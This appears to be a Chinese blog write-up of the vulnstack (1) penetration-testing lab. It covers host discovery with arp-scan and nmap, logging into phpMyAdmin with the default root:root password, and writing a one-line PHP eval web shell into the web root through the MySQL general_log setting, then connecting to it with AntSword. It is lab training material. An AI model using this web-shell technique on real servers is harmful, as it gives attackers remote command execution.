🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦
【红日安全】vulnstack (一)
- 靶场搭建
- 靶场渗透
- 明确目标
- 信息收集
- phpadmin后台getshell
靶场搭建
靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
下载解压后在VM中打开
靶场渗透
明确目标
目标跟我们处于同一个网段
信息收集
先查一下我们自己的IP,用 ifconfig 查看攻击机的IP为192.168.64.131
探测一下跟我们同一网段下的主机有哪些,用Kali自带的arp扫描器扫描同一网段下的主机,发现了同一网段下的不同IP192.168.64.134
,判断它就是要渗透的主机。
arp-scan -l 扫描网段所有主机
arp-scan -I eth0 -l 扫描指定网段所有IP
扫到IP之后接下来扫描端口,发现它开启了80
、3306
端口
nmap -T4 -p- 192.168.64.134
访问一下80端口,发现是phpStudy探针界面,在其中发现了它的操作系统是Windows
,服务器是Apache
用dirsearch
扫一下看看能发现什么,成功扫出来了phpmyadmin
界面
访问一下看看,发现是一个登陆界面
用弱口令试试,刚开始试了admin:123456提示错误,又用root试了一下成功登录进去
账号:root
密码:root
phpadmin后台getshell
- 开启日志
set global general_log='on';
- 改变日志存储位置
set global general_log_file ="c:/phpStudy/www/she.php";
- 写入一句话木马
select '<?php @eval($_POST[cmd]);?>';
- 用蚁剑连接,成功getshell